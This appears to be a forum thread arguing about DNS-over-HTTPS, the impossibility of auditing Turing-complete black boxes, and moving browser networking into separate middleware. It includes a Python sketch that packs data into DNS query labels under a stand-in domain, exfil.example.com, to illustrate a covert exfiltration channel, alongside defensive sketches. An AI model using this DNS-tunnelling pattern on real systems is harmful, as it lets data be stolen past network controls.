Edit: So that's tunneled DNS.
You could also call it encrypted DNS, I suppose. But then, you could say something similar about VPNs, instead of calling them tunnels.
Hard-coded, authenticated DNS would be hard too, but at least it's possible to see which resolver it's using.
That will remove their most cherished authority, so clearly they would hate it and come up with endless fake excuses, but that's why open source matters.
If you want to trust it, you have to be able to audit its workings. There is no magic sauce at the network layer that gets around this step, and after this step nothing else is needed.
This is the fundamental problem: we provably cannot even know whether the black box will halt[1], so we obviously cannot audit it for behaviors far more complex than simply halting. Even worse, if the black box is equivalent to a Turing machine with more than ~8k states, its behavior cannot be described in ZF set theory[2].
> There is no magic sauce from a network layer
As long as the black box is Turing complete, any noisy channel[3] to the network that it can influence can be used as the foundation for a reliable digital channel. The solution is to limit the black box so that it is not Turing complete: the decision problems about its behavior must be decidable.
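As a toy illustration of that claim (everything here is invented for the example, including the domain): a program whose only permitted network I/O is name lookups can still move arbitrary bytes, simply by packing the payload into the hostname labels it is allowed to query.

```python
# Sketch: a covert channel built from "allowed" DNS lookups.
# The sandbox sees ordinary name queries; the receiving resolver sees data.

def encode_as_labels(payload: bytes, max_label: int = 63) -> list[str]:
    """Pack bytes into DNS-safe hostname labels (hex, <=63 chars each)."""
    hexed = payload.hex()
    return [hexed[i:i + max_label] for i in range(0, len(hexed), max_label)]

def decode_labels(labels: list[str]) -> bytes:
    """Recover the payload on the attacker-controlled resolver's side."""
    return bytes.fromhex("".join(labels))

labels = encode_as_labels(b"exfiltrated secret")
# Hypothetical lookups the black box would emit:
queries = [label + ".exfil.example.com" for label in labels]
```

Real-world tunnels add error correction on top (that's where the noisy-channel coding theorem comes in), but the round trip alone makes the point: if the box can influence queries, it has a channel.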
A good example of a limited design is the original World Wide Web. HTML with 3270-style forms (or an updated, better-looking version with modernized form tags) was decidable, with the undecidable complexity sandboxed on the server. The instructions to the client (HTML) and the communications with the server (links/URLs, POSTed form fields) are understandable by both humans and machines.
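The "understandable by machines" property can be made concrete: for a forms-only page, every request the client could ever make can be enumerated statically, without executing anything. A minimal sketch with Python's stdlib parser (the page content is invented):

```python
from html.parser import HTMLParser

PAGE = """
<form action="/search" method="post">
  <input name="query">
  <input type="submit" value="Go">
</form>
"""

class FormAuditor(HTMLParser):
    """Statically enumerate every request a forms-only page can make."""
    def __init__(self):
        super().__init__()
        self.actions = []  # (method, action) pairs
        self.fields = []   # named input fields

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append((attrs.get("method", "get"), attrs.get("action")))
        elif tag == "input" and "name" in attrs:
            self.fields.append(attrs["name"])

auditor = FormAuditor()
auditor.feed(PAGE)
# auditor.actions and auditor.fields now describe the page's entire
# client->server behavior -- the decision problem is trivially decidable.
```

Try doing the same for a page that ships arbitrary JavaScript: you're back at the halting problem.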
Today's web requires trusting a new set of undecidable software on each page load. We're supposed to trust 3rd parties even though trust is not transitive. We're supposed to accept the risk of running 3rd party software even though risk is transitive. Now these problems are leaking into other areas like DNS, and the Users lose yet another battle in the War On General Purpose Computing[4][5].
[1] https://en.wikipedia.org/wiki/Halting_problem
[2] https://www.scottaaronson.com/blog/?p=2725
[3] https://en.wikipedia.org/wiki/Noisy-channel_coding_theorem
It's open middleware, just like the glibc resolver. For example, it's entirely possible to force applications to use the glibc resolver: just don't let them open sockets to anything but 127.0.0.1:53. They wouldn't be able to use http/https either in that case, but that's the point.
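A process-local sketch of that restriction (the real enforcement belongs in the kernel, via network namespaces, seccomp, or firewall rules, outside the app's reach; the allowlist and names here are mine):

```python
import socket

# In-process illustration only: a real deployment would enforce this
# outside the application, where the app cannot undo it.
ALLOWED = {("127.0.0.1", 53)}  # the local resolver, and nothing else

_real_connect = socket.socket.connect

def restricted_connect(self, address):
    """Refuse any destination that isn't the local resolver."""
    if tuple(address) not in ALLOWED:
        raise PermissionError(f"blocked connection to {address}")
    return _real_connect(self, address)

socket.socket.connect = restricted_connect
```

The check fires before any packet leaves the machine, so a disallowed `connect()` fails immediately.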
If you are thinking about side-channels like HTTP over DNS(S), then fine, but the middleware can see the traffic because that's its job. If the app starts making encrypted requests, at least you would know, and since it's open source the user can fix it and tell everyone the application is using a side-channel to subvert the user.
_But that misses the point._ The app wouldn't have DNS code in it. It would only be able to ask to map a name to a record. And even then, that misses the point too. In the end it wants to fetch a URL, and what I am talking about does that. Firefox parses a GET it was handed, and if it wants to make additional GETs/POSTs, it hands them over. No DNS or networking code needed in the browser. Linking to an SSL lib would be a bug.
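That division of labor can be sketched as a tiny request broker; all the names and the policy below are hypothetical:

```python
from urllib.parse import urlparse

class FetchBroker:
    """Middleware that owns all networking. Apps hand over URLs; the
    user's policy decides. The app itself has no sockets, DNS, or TLS."""

    def __init__(self, policy):
        self.policy = policy  # user-controlled, not vendor-controlled

    def request(self, method: str, url: str):
        host = urlparse(url).hostname
        if not self.policy(method, host):
            return ("denied", url)
        # Only here would name resolution, the TLS handshake, and the
        # actual fetch happen -- in one auditable place.
        return ("allowed", url)

# Example user policy: block a (hypothetical) tracker domain outright.
broker = FetchBroker(lambda method, host: host != "tracker.example.com")
```

Because every fetch funnels through one layer, a content blocker is just another policy plugged in here, rather than a privileged extension inside each browser.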
Reaching into an arbitrary open source app and getting hold of its SSL machinery to MITM it is always a moving target (aka a deliberate problem), and that's an anti-user feature.
Common middleware that handles the comms (SSL, etc.), at the OS or application level, levels the playing field. The recent DoH changes would have been up to the user, because that code isn't in the browser any more. Users are leveraged by the browser vendors ("want the latest version?", "hey, I see you are using a 0-day browser?") and forced to swallow or fork. I realize users can disable DoH, but again, that's the point. It's a moving target. They can just keep "fixing" the defaults.
Same thing with Chrome's recent changes regarding the DOM blocking API. If Chrome were forced to deal with asking for URLs instead of fetching them directly, it wouldn't matter. The blockers would operate in the middleware.
As I mentioned in my original comment, the point is to axe the networking code from the applications and force them to make requests a layer up. This is not like forcing them through a SOCKS proxy. It's deduplicating the code and making the parts separable. The monolithic nature of browsers isn't some accident.